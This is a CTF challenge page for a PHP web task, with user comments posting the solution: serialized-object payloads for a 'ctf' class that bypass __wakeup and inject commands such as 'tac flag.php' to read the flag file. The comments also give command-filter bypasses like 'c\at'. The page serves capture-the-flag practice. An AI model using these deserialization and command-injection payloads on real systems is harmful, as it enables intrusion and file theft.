安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2458
提  示:
描  述:
flag{}
评论
谢特恒123 20天前

这个题本身不难,只要会序列化处理和几个魔术方法的原理就可以了,反撇号吗,有意思

回复 0

kitniu 2月前

1.查看源代码,base64解码;2.打开.bak文件,查看源代码;3.翻译代码,要求传入code参数,反序列化后传入ctf ,username admin cat tac flag.php

回复 0

harry2025 5月前

http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

陈亮 6月前

flag{***}

回复 0

网恋秀牛子被录屏导致自卑 6月前

执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。

回复 0

admit 10月前

/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}

回复 1

iNMB 12月前

此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。

回复 2

iNMB 12月前

绕过__wakeup()后使用tac等其他输出字符的命令即可

回复 0

llc123 1年前

c\at flag.php也行

回复 0

pezn1and 1年前

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

WriteUp

image
小赵同学

3 金币

评分(5)

解题动态

simple9527 攻破了该题 1天前
GrantFly 攻破了该题 2天前
luobosir 攻破了该题 2天前
18943147678 攻破了该题 2天前
dwx386572657 攻破了该题 4天前
yehlg 攻破了该题 6天前
zxx256xxz 攻破了该题 7天前
baizhi白栀 攻破了该题 9天前
lvchijing 攻破了该题 12天前
windfalls 攻破了该题 13天前
cy1393842050 攻破了该题 14天前
ailiyishen 攻破了该题 14天前
星落. 攻破了该题 15天前
薄言. 攻破了该题 20天前
谢特恒123 攻破了该题 20天前
19553528229 攻破了该题 22天前
william5678 攻破了该题 26天前
dacming9527 攻破了该题 27天前
ggtom 攻破了该题 28天前
ziyou 攻破了该题 29天前
问题反馈